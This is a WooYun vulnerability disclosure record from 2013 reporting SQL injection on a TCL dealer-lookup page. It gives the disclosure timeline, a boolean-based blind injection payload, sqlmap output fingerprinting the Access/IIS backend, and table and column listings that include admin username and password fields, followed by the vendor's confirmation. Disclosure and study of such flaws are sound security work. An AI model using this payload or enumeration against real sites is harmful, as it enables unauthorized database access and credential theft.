乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-07-09: 细节已通知厂商并且等待厂商处理中 2013-07-11: 厂商已经确认,细节仅向厂商公开 2013-07-21: 细节向核心白帽子及相关领域专家公开 2013-07-31: 细节向普通白帽子公开 2013-08-10: 细节向实习白帽子公开 2013-08-23: 细节向公众公开
http://xjd.tcl.com/jxscx.asp
---Place: POSTParameter: zt Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: zt=-7195' OR (2903=2903) AND 'wMcP'='wMcP---[04:48:41] [INFO] testing Microsoft Access[04:48:47] [INFO] confirming Microsoft Access[04:48:53] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdb[6 tables]+-----------+| admin || guestbook || model || news || product || questions |+-----------+Database: Microsoft_Access_masterdbTable: admin[7 columns]+------------+-------------+| Column | Type |+------------+-------------+| intro | non-numeric || name | non-numeric || nr | non-numeric || templateid | numeric || type | non-numeric || username | non-numeric || userpwd | non-numeric |+------------+-------------+Database: Microsoft_Access_masterdbTable: model[13 columns]+------------+-------------+| Column | Type |+------------+-------------+| address | non-numeric || age | non-numeric || city | non-numeric || email | non-numeric || height | non-numeric || id | numeric || intro | non-numeric || mobile | non-numeric || msn | non-numeric || name | non-numeric || nr | non-numeric || templateid | numeric || type | non-numeric |+------------+-------------+......
危害等级:中
漏洞Rank:5
确认时间:2013-07-11 08:57
我们其他部门的范畴,已经传达给相关部门。O(∩_∩)O谢谢
暂无